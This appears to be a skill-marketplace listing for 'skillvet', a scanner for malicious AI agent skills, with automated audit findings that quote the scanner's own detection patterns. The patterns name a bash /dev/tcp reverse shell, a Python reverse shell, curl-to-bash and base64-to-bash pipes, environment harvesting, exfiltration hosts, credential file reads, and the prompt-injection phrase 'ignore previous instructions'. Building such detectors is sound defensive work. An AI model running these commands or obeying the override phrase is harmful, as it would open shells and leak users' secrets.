skillvet
Scans and audits AI agent skills for security vulnerabilities, ensuring safe installations and protecting against malware and attacks.
Install this skill
Security score
The skillvet skill was audited on Feb 21, 2026 and we found 25 security issues across 6 threat categories, including 7 critical. Review the findings below before installing.
Categories Tested
Security Issues
Direct command execution function call
| 165 | | 42 | Python reverse shell | `socket.connect` + `dup2`, `pty.spawn('/bin/bash')` | |
Template literal with variable interpolation in command context
| 125 | | 2 | Bulk env variable harvesting | `printenv \|`, `${!*@}` | |
Piping content to bash shell
| 144 | | 21 | Pipe-to-shell | `curl \| bash` (HTTP and HTTPS) | |
Piping content to bash shell
| 152 | | 29 | Base64 pipe-to-interpreter | `echo '...' \| base64 -D \| bash` — primary macOS vector | |
Piping content to bash shell
| 163 | | 40 | Bash /dev/tcp reverse shell | `bash -i >/dev/tcp/IP/PORT 0>&1` (AuthTool pattern) | |
Piping content to bash shell
| 169 | | 46 | GitHub raw content execution | `curl raw.githubusercontent.com/... \| bash` | |
Node child_process module reference
| 178 | | W2 | Subprocess execution | child_process, execSync, spawn, subprocess | |
Webhook reference - potential data exfiltration
| 124 | | 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin | |
Ngrok tunnel reference
| 124 | | 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin | |
Access to hidden dotfiles in home directory
| 128 | | 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` | |
Access to AWS credentials directory
| 167 | | 44 | Credential file access | Direct reads of `.env`, `.pem`, `.aws/credentials` | |
Access to .env file
| 131 | | 8 | .env file theft | dotenv loading in scripts (not docs) | |
Access to .env file
| 138 | | 15 | Shipped .env files | .env files (not .example) in the skill | |
Access to .env file
| 167 | | 44 | Credential file access | Direct reads of `.env`, `.pem`, `.aws/credentials` | |
Access to .env file
| 187 | `.md`, `.js`, `.ts`, `.tsx`, `.jsx`, `.py`, `.sh`, `.bash`, `.rs`, `.go`, `.rb`, `.c`, `.cpp`, `.json`, `.yaml`, `.yml`, `.toml`, `.txt`, `.env*`, `Dockerfile*`, `Makefile`, `pom.xml`, `.gradle`. |
Base64 decode operation
| 127 | | 4 | Code obfuscation | base64 decode, hex escapes, dynamic code generation | |
Base64 decode operation
| 170 | | 47 | Echo-encoded payloads | Long base64 strings echoed and piped to decoders | |
Character code construction - potential obfuscation
| 145 | | 22 | String construction evasion | String.fromCharCode, getattr, dynamic call assembly | |
Prompt injection: ignore instructions
| 132 | | 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md | |
External URL reference
| 12 | Security scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from [Koi Security](http |
External URL reference
| 97 | const url = "https://bit.ly/legit-link"; // skillvet-ignore |
External URL reference
| 159 | | 36 | Suspicious package sources | `pip install git+https://...`, npm from non-official registries | |
External URL reference
| 198 | - [Koi Security report](https://www.koi.ai/blog/clawhavoc-341-malicious-clawedbot-skills-found-by-the-bot-they-were-targeting) (Feb 2026) |
External URL reference
| 199 | - [The Hacker News coverage](https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html) |
External URL reference
| 200 | - [OpenSourceMalware analysis](https://opensourcemalware.com/blog/clawdbot-skills-ganked-your-crypto) |